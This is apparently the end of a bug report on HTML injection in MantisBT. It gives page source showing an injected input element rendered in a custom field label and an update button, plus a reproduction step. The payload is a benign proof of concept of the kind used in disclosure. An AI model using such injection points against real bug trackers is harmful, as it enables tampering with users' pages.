            &lt;table class=&quot;table table-bordered table-condensed table-striped&quot;>
            &lt;tbody>
                &lt;tr>
                    &lt;th class=&quot;category&quot;>
                        Update &lt;input type=&quot;text&quot; value=&quot;Look I Injected this&quot;>                  &lt;/th>
                    &lt;td>
&lt;input tabindex=&quot;1&quot; type=&quot;text&quot; id=&quot;custom_field_8&quot; name=&quot;custom_field_8&quot;  maxlength=&quot;255&quot; size=&quot;80&quot; value=&quot;&quot; />&lt;input type=&quot;hidden&quot; name=&quot;custom_field_8_presence&quot; value=&quot;1&quot; />
                    &lt;/td>
                &lt;/tr>
        &lt;tr class=&quot;spacer&quot;>&lt;/tr>
        &lt;tr>&lt;th class=&quot;category&quot; colspan=&quot;2&quot;>Selected Issues&lt;/th>&lt;/tr>&lt;tr> &lt;td>&lt;i class=&quot;fa fa-square fa-status-box status-50-fg&quot;></i>  /mantisbt2/view.php?id=22&lt;/td> &lt;td>1&lt;/td> &lt;/tr>
        &lt;tr class=&quot;spacer&quot;>&lt;/tr>
            &lt;/tbody>
        &lt;/table>
        &lt;/div>
        &lt;/div>
        &lt;div class=&quot;widget-toolbox padding-8 clearfix&quot;>
            &lt;input type=&quot;submit&quot; class=&quot;btn btn-primary btn-white btn-round&quot; value=&quot;Update &lt;input type=&quot;text&quot; value=&quot;Look I Injected this&quot;>&quot; />
        &lt;/div>
        &lt;/div>
        &lt;/div>
    &lt;/form>
&lt;/div>
&lt;/div>

&lt;/div>
&lt;/div>
&lt;/div>
&lt;div class=&quot;clearfix&quot;>&lt;/div>
&lt;div class=&quot;space-20&quot;>&lt;/div>
&lt;div class=&quot;footer noprint&quot;>
&lt;div class=&quot;footer-inner&quot;>
&lt;div class=&quot;footer-content&quot;>
&lt;div class=&quot;col-md-6 col-xs-12 no-padding&quot;>
&lt;address>
<strong>Powered by https://www.mantisbt.org</strong> <br>
&lt;small>Copyright &copy; 2000 - 2020 MantisBT Team&lt;/small><br>&lt;small>Contact thisisfortestingresearchonly@gmail.com for assistance&lt;/small><br>
&lt;/address>
&lt;/div>
&lt;div class=&quot;col-md-6 col-xs-12&quot;>
&lt;div class=&quot;pull-right&quot; id=&quot;powered-by-mantisbt-logo&quot;>
&lt;a href=&quot;https://www.mantisbt.org&quot; title=&quot;Mantis Bug Tracker: a free and open source web based bug tracking system.&quot;>&lt;img src=&quot;/mantisbt2/images/mantis_logo.png&quot; width=&quot;102&quot; height=&quot;35&quot; alt=&quot;Powered by Mantis Bug Tracker: a free and open source web based bug tracking system.&quot; />&lt;/a>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;a class=&quot;btn-scroll-up btn btn-sm btn-inverse display&quot; id=&quot;btn-scroll-up&quot; href=&quot;#&quot;>
&lt;i class=&quot;ace-icon fa fa-angle-double-up icon-only bigger-110&quot;></i>
&lt;/a>
&lt;/div>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/bootstrap-3.4.1.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/moment-with-locales-2.24.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/bootstrap-datetimepicker-4.17.47.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/typeahead.jquery-1.3.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/list-1.5.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/ace.min.js&quot;>&lt;/script>
&lt;/body>
&lt;/html>
  • Now it redirect to /bug_actiongroup_page.php and you see a rendered input type with value of Look I Injected this